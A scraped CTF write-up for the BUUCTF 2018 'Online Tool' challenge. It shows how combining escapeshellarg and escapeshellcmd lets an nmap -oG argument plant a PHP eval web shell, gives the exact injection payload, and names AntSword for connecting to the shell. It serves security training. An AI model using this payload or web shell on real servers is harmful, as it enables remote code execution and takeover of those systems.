当前位置:网站首页>BUUCTF WEB [BUUCTF 2018]Online Tool
BUUCTF WEB [BUUCTF 2018]Online Tool
2022-04-23 12:33:00 【Y1Daa】
BUUCTF WEB [BUUCTF 2018]Online Tool
-
Enter the environment , Get a piece of code
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);among ,
escapeshellarg()The function is used to transcode a string to shell The parameters used in the command , That is to escape special symbols such as single quotation marks , And wrap the escaped single quotation marks with two other single quotation marks<?php echo escapeshellarg("123"); // '123' echo escapeshellarg("12' 3");// '12'\'' 3' ?>escapeshellcmd()Function for shell Metacharacter escape , It's in special characters and No paired single quotes Insert before\<?php echo escapeshellcmd("123"); // 123 echo escapeshellcmd("12' 3");// 12\' 3 echo escapeshellcmd("12'' 3");// 12'' 3 ?>Here you can refer to this article Talk about escapeshellarg The problem of parameter bypass and injection (lmxspace.com) Know how to solve this problem
-
Because of the existence of two filters , We can only execute one order . stay nmap There are several parameters in the
OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.You can write commands and results to files
-
Here we can use
escapeshellargAndescapeshellcmdUsed together to construct a command execution vulnerability?host=' <?php @eval($_POST["cmd"]);?> -oG shell.php 'Echo as
you are in sandbox ae49321bc77b6271cb2db4ba23d835f1Starting Nmap 7.70 ( https://nmap.org ) at 2022-04-22 05:26 UTC Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds -
Connect with an ant sword , Find... In the root directory of the file flag file
flag{24d949bf-db37-41b9-9e74-9f9e202d0af7}
版权声明
本文为[Y1Daa]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231227159591.html
边栏推荐
- Database Navigator 使用默认MySQL连接提示:The server time zone value ‘Öйú±ê׼ʱ¼ä’ is unrecognized or repres
- Lesson 24 analysis of classical problems
- 第二十五课 类的静态成员变量
- STM32控制步进电机(ULN2003+28byj)
- Uni app native app local packaging integrated Aurora push (jg-jpush) detailed tutorial
- 标签与路径
- Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
- Markdown grammar learning
- Zigbee之CC2530最小系统及寄存器配置(1)
- 解决disagrees about version of symbol device_create
猜你喜欢
How to solve the computer system card?
电脑系统卡如何解决?
基于卷积神经网络的遥感影像分类识别系统
In idea Solution to the problem of garbled code in Chinese display of properties file
A graphic designer's fantasy world | ones characters
同态加密技术学习
Idea code formatting plug-in save actions
免费试用一个月的服务器,并附上教程
没有空闲服务器?导入 OVF 镜像快速体验 SmartX 超融合社区版
box-sizing
随机推荐
电脑系统卡如何解决?
编程辅助工具推荐:图片工具snipaste
Web17——EL与JSTL的使用
I changed to a programmer at the age of 31. Now I'm 34. Let me talk about my experience and some feelings
[unity note] basic lighting in l4unity
一个平面设计师的异想世界|ONES 人物
How to solve the computer system card?
S2-062 remote command execution vulnerability recurrence (cve-2021-31805)
Nativeformysql connects to MySQL 8 prompt: 1251 - client does not support authentication protocol
IDEA设置版权信息
网站首页文件被攻击篡改的形式有哪些
Fastjson 2 来了,性能继续提升,还能再战十年
SynchronousQueue 源码解析
Debug Jest test cases in VSCode, debug Jest test cases in VSCode, middle note basedir=$(dirname "$" (echo "$0" sed -e -e, s, \ \, / "-e").
QT double buffer drawing
QT interprocess communication
C#,二维贝塞尔拟合曲线(Bézier Curve)参数点的计算代码
S2-062 远程命令执行漏洞复现(cve-2021-31805)
Everything can be expected in the future | one 2022 campus recruitment officially opened
uni-app 原生APP-云打包集成极光推送(JG-JPUSH)详细教程